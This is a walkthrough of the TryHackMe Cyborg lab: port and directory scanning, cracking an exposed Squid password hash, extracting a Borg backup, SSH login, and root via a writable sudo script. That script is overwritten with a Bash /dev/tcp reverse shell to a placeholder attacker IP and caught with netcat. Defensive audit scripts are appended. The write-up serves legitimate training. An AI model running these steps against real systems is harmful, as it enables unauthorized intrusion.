Room Details

TryHackMe Cyborg room contains:

  • Service Discovery
  • Web Content Discovery
  • Hash Cracking
  • Data Decompression
  • Privilege Escalation


  • IP:

Service Discovery

  • Scan for open ports with nmap
    $ nmap -sC -sV -A -sS -Pn -oN nmap.txt
    Nmap scan report for
    Host is up (0.44s latency).
    Not shown: 998 closed tcp ports (reset)
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
    |   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
    |_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    No exact OS matches for host (If you know what OS is running on it, see ).
    TCP/IP fingerprint:

    Network Distance: 4 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 993/tcp)
    1   279.37 ms
    2   ... 3
    4   514.99 ms

    OS and Service detection performed. Please report any incorrect results at .
  • Services Discovered

    Service  Port  Version
    HTTP     80    Apache 2.4.18
    SSH      22    OpenSSH 7.2p2
  • OS: Ubuntu, inferred from the service version strings

  • Answer Task 2 first three questions

Web Content Discovery

  • Scan for directories using gobuster

    gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
  • Directories Discovered

    Dirs    Description  Files Found
    /admin  homepage     from archive dropdown found archive.tar file
    /etc    squid proxy  squid password and configuration files

Analyzing Directories

  • Under /etc we found /etc/squid/passwd, which contains a password hash, and the Squid config file /etc/squid/squid.conf

    # reading files
    # /etc/squid/passwd
    # /etc/squid/squid.conf
    auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
    auth_param basic children 5
    auth_param basic realm Squid Basic Authentication
    auth_param basic credentialsttl 2 hours
    acl auth_users proxy_auth REQUIRED
    http_access allow auth_users
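
Both findings so far (the Squid password file and archive.tar) were retrievable because they sat under the web server's document root. A defensive sweep for that condition, as an added example that is not part of the original writeup; the function name, the marker list and the GNU grep/find dependency are assumptions:

```shell
#!/bin/sh
# Added example: look for credential files and backup archives under a web root.
# Assumes GNU grep/find; the marker list below is an assumption, extend as needed.

# htpasswd-style entry: "user:" followed by an apr1, crypt, bcrypt or {SHA} hash.
HTPASSWD_RE='^[^:[:space:]]+:(\$(apr1|1|2[aby]|5|6)\$|\{SHA\})'

# Print "CREDENTIAL <path>" / "ARCHIVE <path>" for each risky file under $1.
scan_docroot() {
    s_root=$1
    # Files with at least one htpasswd-style line (the format of /etc/squid/passwd).
    grep -rlE "$HTPASSWD_RE" "$s_root" 2>/dev/null | sed 's/^/CREDENTIAL /'
    # Downloadable archives and backups, such as the archive.tar served from /admin.
    find "$s_root" -type f \( -name '*.tar' -o -name '*.tar.gz' -o -name '*.tgz' \
        -o -name '*.zip' -o -name '*.bak' \) 2>/dev/null | sed 's/^/ARCHIVE /'
}

# Live use: sh scan.sh /var/www/html
if [ -n "${1:-}" ]; then
    scan_docroot "$1"
fi
```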

Cracking Password Hash

  • Store hash into a file passwd_hash.txt

  • Crack the hash using john (John the Ripper)

    john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

    squidward (music_archive)

  • We’ve successfully found the password from the hash

Analyzing Tar file

  • Extract the tar file

    tar -xvf archive.tar
  • Found a README file, which leads us to the Borg documentation page

  • We need to install borg to extract the files from the compressed format

  • Install borg

    sudo apt install borgbackup -y

    This command is for Debian-based distributions.
    For other distributions, refer to the Borg installation documentation.

  • Decompress the files extracted from archive.tar using borg

    borg extract ./home/field/dev/final_archive::music_archive
  • After the files are decompressed successfully, the data turns out to be a backup of the home directory of alex’s account

  • Found Password from /home/alex/Documents/note.txt

    Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

Login with ssh

  • Login using alex’s

    ssh [email protected]
    [email protected] password: # enter password from note.txt
    Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
    * Documentation:
    * Management:
    * Support:
    27 packages can be updated.
    0 updates are security updates.
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    [email protected]:~$
  • We now have access to alex’s account

Get User Flag

[email protected]:~$ cat user.txt

Privilege Escalation

  • Check for sudo executables

    [email protected]:~$ sudo -l
    Matching Defaults entries for alex on ubuntu:
        env_reset, mail_badpass,
    User alex may run the following commands on ubuntu:
        (ALL : ALL) NOPASSWD: /etc/mp3backups/

    We can run the file /etc/mp3backups/ with root privileges

  • Check whether file is writable

    [email protected]:~$ ls -la /etc/mp3backups/
    -r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/

    The file is not writable, but its owner is alex, so we can change the file permissions using chmod

  • Grant all permissions on the file

    [email protected]:~$ chmod 777 /etc/mp3backups/

    Note: Giving all users rwx permissions isn’t good practice, but for ease, I’ve granted them here

  • Overwrite the file with a Bash reverse shell on alex’s machine

    [email protected]:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/

    The reverse shell will connect to the attacker’s machine on port 4444

  • Start netcat on attacker’s machine

    nc -nlvp 4444
  • Execute bash script from target machine

    [email protected]:~$ sudo /etc/mp3backups/
  • Now, we’ve successfully rooted the machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [] 36492
    [email protected]:~#
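
The escalation above works because the NOPASSWD target is owned by alex, so its read-only mode bits can be undone with chmod. A defensive audit for that condition, as an added example that is not part of the original writeup; the function names are hypothetical, GNU stat is assumed, and only the file and its immediate parent directory are checked:

```shell
#!/bin/sh
# Added example: flag NOPASSWD sudo targets that a non-root user can modify.
# Assumes GNU coreutils stat (stat -c).

# Print every absolute command path from NOPASSWD rules in `sudo -l` output (stdin).
nopasswd_cmds() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' |
        tr ',' '\n' | awk '$1 ~ /^\// { print $1 }'
}

# Given an owner uid and an octal mode (as printed by stat -c '%u %a'),
# print one finding per line; print nothing when the file is safe.
mode_findings() {
    f_uid=$1 f_mode=$2
    # A non-root owner can chmod the file at will, so read-only bits do not help.
    [ "$f_uid" -eq 0 ] || echo "owner-not-root"
    f_other=${f_mode#"${f_mode%?}"}      # last octal digit
    f_rest=${f_mode%?}
    f_group=${f_rest#"${f_rest%?}"}      # second-to-last octal digit
    case $f_group in 2|3|6|7) echo "group-writable" ;; esac
    case $f_other in 2|3|6|7) echo "world-writable" ;; esac
}

# Audit a sudo target and its parent directory (a writable directory lets the
# file be replaced even when the file itself is locked down).
audit_path() {
    for a_target in "$1" "$(dirname "$1")"; do
        if ! a_info=$(stat -c '%u %a' "$a_target" 2>/dev/null); then
            echo "$a_target: missing"
            continue
        fi
        mode_findings "${a_info% *}" "${a_info#* }" | while read -r a_finding; do
            echo "$a_target: $a_finding"
        done
    done
}

# Live use: sh audit.sh --live   (audits the invoking user's own sudo rules)
if [ "${1:-}" = "--live" ]; then
    sudo -n -l 2>/dev/null | nopasswd_cmds | while read -r cmd; do
        audit_path "$cmd"
    done
fi
```

For a file with the mode shown in the listing above (r-xr-xr--, owned by a non-root user) the only finding is owner-not-root, which is exactly the condition that made the chmod step possible.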

Get Root Flag

[email protected]:~# cat root.txt